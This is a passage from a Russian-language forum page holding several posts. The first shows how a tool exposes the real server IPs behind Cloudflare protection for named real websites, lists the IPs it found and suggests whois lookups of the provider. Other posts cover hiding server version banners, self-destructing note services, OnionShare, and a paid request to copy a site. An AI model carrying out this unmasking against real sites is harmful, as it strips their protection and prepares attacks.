ип-адреса они не подходят. Единственное что мы можем вытянуть от сюда это то, что данный сайт использует электронную почту от Гугл. Строчка Scanning crimeflare databse… означает, что этап поиска сайтов в базе данных начался. Строчка Did not find anything означает, что в базе данных ничего не нашлось Строчка Scannig 2897 subdomains (subdomains.txt), please wait.. означает, что этап перебора всех возможных субдоменов по словарю был начат. Красная строка говорит нам о найденных субдоменах, однако их ип-адрес защищен, а это значит, что они нам не нужны. Зеленая же строка говорит о том, что найденные субдомены не находятся под защитой, а значит их можно использовать для обнаружения настоящего ип-адреса. Как пример из данных скринов я могу указать mail.anti-malware.ru, но к сожалению, данный ип-адрес опять принадлежит Гугл. Однако мы нашли то, что искали, это строка test.anti-malware.ru – ип-адрес VPS сервера. Следующее сканирование, сайт – searchengines.guru Вот результаты сканирования: Из них мы можем понять, что первый и третий этап не показали нам никаких результатов. Зато в базе данных мы сразу нашли настоящий ип-адрес. Теперь сканируем searchengines.ru В первом этапе мы можем увидеть только почтовые сервисы Google. В базе данных информации по сайту нет ничего. Зато на третьем этапе мы нашли много интересной информации: [09:19:32] [FOUND:SUBDOMAIN] cdn.searchengines.ru IP: 54.192.98.230 HTTP: 403 [09:20:51][FOUND:SUBDOMAIN] link.searchengines.ru IP: 90.156.201.86 HTTP: 200 [09:21:06] [FOUND:SUBDOMAIN] mail.searchengines.ru IP: 64.233.164.121 HTTP: 200 Mail.searchengines ведет на ип-адрес электронной почты Cdn.searchengines.ru – находится под защитой, значит он нам не подойдет Однако, link.searchengines.ru имеет ип-адрес сторонненго сервера. Открыв данну страницу мы увидим богом забытый онлайн-сервис. Это и может являться ип-адресом данного сайта. Однако в любом случае, данной субдомен связан с искомым сайтом. Ип-адрес сразу же был найден в базе данных, однако такой же ип имеют и субдомены, это может быть особенностью DNS. В этих случаях сервисы от Гугл не используется, однако используется другой сервис – protonmail. Данный домен имеет в себе неплохие MX-записи, как вы могли заметить. Данный ип-адрес может быть не только искомым ип-адресом сайта, но еще и быть источником полезных данных о провайдере, который предоставляет услуги интернета. А с помощью whois мы можем узнать его адрес и номер телефона. Также зеленый субдомен является очень интересным. Ведь в нем есть информации о ином возможном ип-адресе сайта. Однако не стоит сомневаться, данный ип-адрес также связан с создателем сайта.
  11. В данной статье хочется немного поговорить о безопасности, ведь в немалом количестве UNIX-подобных операционных системах изначально можно узнавать огромное количество данные, узнав которые, злоумышленники смогут спланировать и создать атаку на ваш сервер. Как пример я могу сказать, что использовав команду curl –I ip_adress, злоумышленник сможет узнать служебные данные о серверы, обо всех версиях и модулях, которые им используются. Если такая информация попали в нехорошие руки, то есть огромное вероятность того, что будет совершена атака, например, для тестирования различных уязвимостей или вовсе для использования в своих целях. Максировка Apache Чтобы иметь возможность выполнения данного действия, в вашу систему нужно будет установить пакет libapache-mod-security, после чего вам нужно будет подключить модуль, команда для подключения: # a2enmod mod-security После этого нам нужно запустить файл /etc/apache2/conf.d/security, всю ненужную информацию мы комментируем, а между тем добавляем это: ServerSignature Off ServerTokens Full SecServerSignature "httpd (OpenBSD)" Как только вы это сделаете, вам нужно будет сделать ребут apache и узнать, не изменился ли заголовок вашего сервера: # /etc/init.d/apache2 restart ... $ curl -I localhost HTTP/1.1 200 OK Date: Fri, 19 Sep 2014 17:11:30 GMT Server: httpd (OpenBSD) X-Powered-By: PHP/5.3.28-1~dotdeb.0 Скрываем версию Nginx Это тоже является немало важным, но чтобы это сделать нам необходимо создать файл /etc/nginx/conf.d/nginx.conf добавив в него данную строку кода: server_tokens off; После чего как и с apache мы его перезапускаем и проверяем работоспособность. Скрываем версию PHP Повторяем практически те же действия, запускаем файл /etc/php5/apache2/php.ini а в нем мы изменяем значение параметра expose_php на Off: expose_php = Off Опять перезапускаем инструмент и проверяем информацию о сервере: # /etc/init.d/apache2 restart ... $ curl -I localhost HTTP/1.1 200 OK Date: Fri, 19 Sep 2014 17:11:30 GMT Server: httpd (OpenBSD)
  12. На данный момент есть огромное количество сервисов, которые предлагают вам передавать какие-либо файлы или сообщения, которые будут удалены сразу после прочтения или скачивания. Обычно когда используются данные проекты, создается специальная “записку” на которую можно установить даже пароль, который будет известен только определенных лицам, а это значит, что данные не смогут быть получены третьими лицами. Дальше я расскажу вам про три таких сервисов, но не забывайте, что авторы данных проектов, обычно, не предоставляют доказательств о том, что ваши данные были удалены с их серверов, о том, что ваши данные специально не сохраняются и не используются в дальнейших целях. Поэтому если вы собираетесь использовать их для передачи особо важных данных, то советуем воспользоваться другими способами. Например, проекты по типу “сжечь после прочтения” вместе с шифрованием текста и специальным ключом для человека, который будет получать информацию. 1.Secserv.me Данный сервис предоставляет возможность создания группового чата, а так же есть удобный раздел с видео мануалами. Отсутствуют рекламные приложения от Гугла и Яндекса. Соединение производится с помощью HTTPS которое также зашифровывается с помощью 265-битного AES и 2048-битного RSA. Загрузить можно абсолютно любой файл, размер которого не превышает семь мегабайт, а также зашифровать его. Также расшифровать ключи невозможно, так как адрес с “запиской” открыть повторно невозможно. Также для обеспечения большей защиты данных, вы можете установить пароль на ваш файл. Ключ формируется из некоторых данных из вашего браузера, вашего пароля и случайных данных, который были сгенерированы алгоритмом Fortuna PRNG. Как только сообщения будет прочтено, вы сможете увидеть случайную картинку, только это вы можете увидеть после перехода по ссылку. Но главной фишкой данного сервиса является то, что сообщения шифруются с помощью 256-битного AES прямо перед тем, как вы отправляете файл или сообщение. В первой половине ссылке находится уникальный ключ сообщения, которое было зашифровано. Это означает, что ключ не попадает на сервера проекта, а это говорит о том, что ваши данные никто не сможет расшифровать и узнать содержимое ваших файлов. 2. Crypt-A-Byte Этот проект, как и следующий имеет открытый исходный код. Также данный сервис имеет API. Шифрует данные основываясь на публичных ключах, HTTPS, SSL и прочее. Все файлы проходят шифрование через 256-битный AES и SHA алгоритмы. Также вы можете создать случайный пароль и отправлять одноразовые письма на электронную почту. Так как проект имеет открытый исходный код, то с помощью него вы можете сделать приложение для операционных система типа Unix, а для двух других известных платформ на данный момент есть только тестовые сборки. Чтобы расшифровать сообщения или файлы, вы должны ввести пароль, который вы задавали перед созданием ключа. Информация никогда не находится в открытом доступе и произвести дешифровку без вашего пароля невозможно, как говорят авторы. 3. One Time Secret Как уже говорилось выше, данный проект также имеет открытый исходный код и API. Все данных проходят через SSL. Из минусов можно отметить то, что ваш IP будет сохранен на сайте. Будет показана информация о используемом браузере, чтобы в будущем улучшить работу сайта. Если вы перешли на проект через реф. ссылку, то будет получена информации о местоположении данного адреса. Есть возможность установления пароля, который никогда не запоминается. Созданные записки остаются активными до недели для анонимных пользователей и до 2 недель для бесплатных учетных записей. Также имеются ограничения по размеру файла, а именно: для анонимных пользователей текстовые файлы до ста килобайт, для бесплатных аккаунтов сто килобайт, для платных аккаунтов более ста килобайт.
  13. Всем привет, сегодня мы поговорим о анонимном файлообменнике, а именно OnionShare. OnionShare является консольной программой, с помощью которой вы можете передавать файлы практически любых размеров напрямую тому человеку, которому это требуется. Выполняется это с помощью анонимной сети Tor. Это значит, что при передаче файлов, никто не сможет узнать их содержимое, а значит передача будет абсолютно безопасной и конфиденциальной. Как уже возможно многие знают, Tor – это технология, благодаря который вы можете создавать анонимное соединение, которое дает вам возможность безопасно отправлять и получать данные. Эта сеть не позволяет проводить слежку за вами, все информация тщательно шифруется, а потом отправляется сразу через пару сетевых узлов, называя этот процесс луковой маршрутизацией. OnionShare включается в себя также удобный графический интерфейс, а это значит, что даже неопытный пользователь сможет пользоваться услугой безопасной передачи файлов. Прежде чем отправить какой-то файл, данная утилита создает сайт под сетью Tor, после чего ссылку, а также пароль к этому сайту передается через зашифрованные сообщения. Благодаря этой технологии, никому невозможно перехватить или узнать содержимое передаваемых файлов, а это значит, что вы получаете полную безопасность. Для дальнейшей передачи файлов, пользователи могут воспользоваться TorChat, это приложение помогает отправлять анонимные сообщения, которая шифруются сетью Tor. Там или же в другом удобном месте вы передаете ссылку на скачивание, которая приведет вас в Tor Browser, где уже можно будет непосредственно скачать файл. Все происходит на временном сайте, а это значит, что другой пользователь не будет обязан устанавливать этот анонимный файлообменник. Когда скачивание завершено, сайт сразу же отключается в автоматическом порядке, а это значит повторно использовать этот сайт уже будет нельзя.
  14. Заплачу за копирование сайта stuner.net , необходима загрузка всех основных функций сайта для работы оффлайн. Цена договорная. Дорого.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.